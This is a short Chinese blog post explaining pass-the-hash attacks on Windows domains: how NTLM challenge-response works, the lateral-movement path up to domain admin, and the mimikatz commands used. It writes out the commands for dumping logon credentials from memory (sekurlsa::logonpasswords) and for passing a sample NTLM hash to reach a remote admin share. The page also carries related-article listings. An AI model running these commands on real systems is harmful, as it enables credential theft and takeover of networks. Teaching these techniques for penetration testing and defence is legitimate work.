哈希传递通信过程

最新推荐文章于 2024-08-09 13:38:32 发布
最新推荐文章于 2024-08-09 13:38:32 发布
阅读量379 收藏 4
点赞数 5
分类专栏: 网络安全 文章标签: 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46390077/article/details/135852358
版权

哈希传递:

 哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。

NTLM验证靠HASH值

1.获得一台域主机的权限

2.Dump内存获得用户hash

3.通过pass the hash尝试登录其他主机

4.继续搜集hash并尝试远程登录

5.直到获得域管理员账户hash,登录域控,最终成功控制整个域

画图显示通信过程:

1、client发送账户名user到server

2、server判断本地账户名是否存在,没有则失败,有的话生成challenge,查找user对应的NTLM哈希,使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client

3、client接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,发送response给server

4、server对比自己内存中的net-ntlm hash与client发来的response是否一致

mimikatz:

利用:

hash传递浏览上传文件

      当域内的用户想要访问域中的某个服务时,输入用户名和密码访问,本机kerberos服务会向KDC的AS认证服务发送一个AS-REQ认证请求。

      该请求包中包含: 请求的用户名客户端主机名、加密类型Authenticator(用户NTLM Hash加密的时间戳)以及一些其他信息

       在AS-REQ阶段,是用用户密码Hash加密的Authenticator,所以也就造成了hash传递。我们只需要获取域用户Hash,同时目标机器开放smb服务,就可以进行Hash传递攻击。

privilege::debug     提升权限(注:需以管理员权限运行) 

sekurlsa::logonpasswords      获取内存中保存的登录信息 

sekurlsa::pth /user:administrator /domain:xiusafe.com /

ntlm:a803cf45d87009c404eb89df4b1ae94c       弹出新窗口 

dir \\10.10.10.254\c$

 

 

爱吃银鱼焖蛋
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali密码攻击之——哈希传递攻击
The__Apollo的博客
04-22 7238
passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在计算机上的用户名和密码的hash值的时候,他虽然不知道密码值,但是仍然可以通过直接连接远程主机,通过传送密码的hash值来达到登录的目的。passing the hash套件
socket通信传文件
10-17
在整个过程中,为了确保数据的完整性和正确性,可以使用校验和或MD5等哈希算法来验证接收到的文件是否与原始文件一致。此外,考虑到网络的不可靠性,可能需要实现重传机制,以便在数据传输失败时重新发送丢失的数据...
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 547
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
内网横传之哈希传递(Pass The Hash)
11-25 7352
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
哈希传递常用方法_hash传递工具(1)
2401_84972799的博客
05-14 726
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
Metasploit之Hash值传递渗透
a1b2c3是弱口令
12-06 3098
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取到hash值的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
哈希传递攻击
good good study
05-05 1475
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
哈希传递(PTH)
A526847的博客
05-31 1233
假设这么一种情况,我们已拿到的域内所有的账户Hash,包括 krbtgt账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域 内加固时忘记重置krbtgt密码,基于此条件,我们还能利用该票据重新获得域管理员权限,利用krbtgt的 HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成 员,可用于Kerberos认证的任何服务。白银票据就是伪造的ST。但是普通的金票不能够跨域使用,也就是说金票的权限被限制在当前域内。
内网渗透 - 哈希传递攻击
LuckySec
06-06 2381
在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
NtlmSocks - 一个工作在网络层的跨平台哈希传递工具.zip
07-18
NtlmSocks是一个专为网络层设计的跨平台哈希传递工具,它主要用于安全研究人员和渗透测试专家在进行安全评估时使用。该工具的名字来源于它处理NT LAN Manager(NTLM)身份验证协议,并利用了SOCKS(Socket Secure)...
分布式哈希表(Distributed Hash Table DHT)1
08-03
- **传递算法**:节点间传递查询请求,直至找到目标节点,通常与广播算法结合使用。 - **贪心算法**:每次选择最近的节点作为下一次查询的目标,以减少查找步骤。 ### 4. 组通信算法 组通信是DHT中实现多播和广播...
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
My_Ftp_Item_Ultimate.zip_ftp_哈希
07-15
这个名为"My_Ftp_Item_Ultimate.zip_ftp_哈希表"的压缩包文件,显然包含了一个针对Linux环境的FTP服务器实现,该实现特别强调了哈希表的数据结构以及与之相关的进程间通信(IPC)机制,如共享内存和消息队列。...
网络协议与网络版计算器:深度融合与技术创新
shiming8879的博客
08-09 798
网络协议是网络通信中双方必须共同遵守的一组约定和规则,它们定义了数据如何封装、寻址、传输、接收以及错误处理等各个环节。常见的网络协议包括TCP/IP协议族、HTTP、FTP、SMTP等,它们各自承担着不同的功能,共同构成了复杂的网络通信体系。TCP/IP协议族:作为互联网的基础协议,TCP(传输控制协议)负责数据的可靠传输,通过三次握手建立连接,确保数据包的顺序和完整性;IP(互联网协议)则负责数据的寻址和路由,将数据包从源地址发送到目的地址。HTTP(超文本传输协议)
网编——TCP与UDP
最新发布
2401_85947445的博客
08-09 140
TCP和UDP各有优缺点,选择哪种协议取决于具体的应用需求。如果需要高可靠性和顺序保证的数据传输,应使用TCP;如果需要快速传输且可以容忍一定数据丢失的应用,则可以选择UDP。
计算机网络基础 - 计算机网络和因特网(2)
Al_tair的博客
08-05 855
大家好呀!我是小笙,本章我主要分享计算机网络基础 - 计算机网络和因特网(2)学习总结,希望内容对你有所帮助!!
计算机网络 6.3Internet组成6.4Internet地址
XD_356A的博客
08-06 719
5.Internet系统集成服务:ISP将协助并帮助客户做好入网的工作,负责为企业或个人用户提供全面的Internet解决方案。6.从事数据库及各种类型的信息方面的服务:通过网络向用户提供各种信息资源,特别是专业的数据库及信息增值方面的服务。2.IP的主要任务:将相互独立的多个网络互联起来,并提供标识网络及主机节点地址的功能。2.功能:为用户提供与Internet相连所需的设备,并建立通信连接,提供信息服务。3.分类:①提供接入服务的IAP;1.定义:提供Internet访问和信息服务的公司或机构。
基于分布式哈希表的通信协议
07-28
基于分布式哈希表(Distributed Hash Table,DHT)的通信协议是一种用于在分布式系统中进行节点之间通信的协议。它结合了DHT的分布式数据存储和哈希表的快速查找特性,提供了一种高效的通信机制。 在基于DHT的通信协议中,节点之间的通信通过对键(key)进行哈希运算来确定消息的路由。每个节点都维护着一个部分或完整的DHT,并根据键的哈希值将消息路由到负责该键范围的节点上。这种方式确保了消息的快速传递和均衡负载。 通常,基于DHT的通信协议包括以下几个关键步骤: 1. 哈希键:将消息中的键进行哈希运算,得到一个唯一的标识符。 2. 查找节点:使用DHT的查找算法,根据哈希键找到负责该键范围的节点。 3. 发送消息:将消息发送给负责该键范围的节点。 4. 路由转发:如果负责该键范围的节点不是目标节点,它会根据DHT协议将消息继续路由转发给下一个合适的节点,直到消息达到目标节点。 基于DHT的通信协议具有良好的可扩展性和容错性。当节点数量增加或网络拓扑发生变化时,DHT可以动态地重新分布数据和更新路由信息,从而适应系统的变化。此外,数据的冗余存储和多次传递路径选择也增强了系统的容错性。 一些常见的基于DHT的通信协议包括Chord、Kademlia、CAN(Content-Addressable Network)等。它们在路由算法、节点查找、数据复制等方面有所不同,但都基于DHT的基本原理来实现节点之间的通信
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值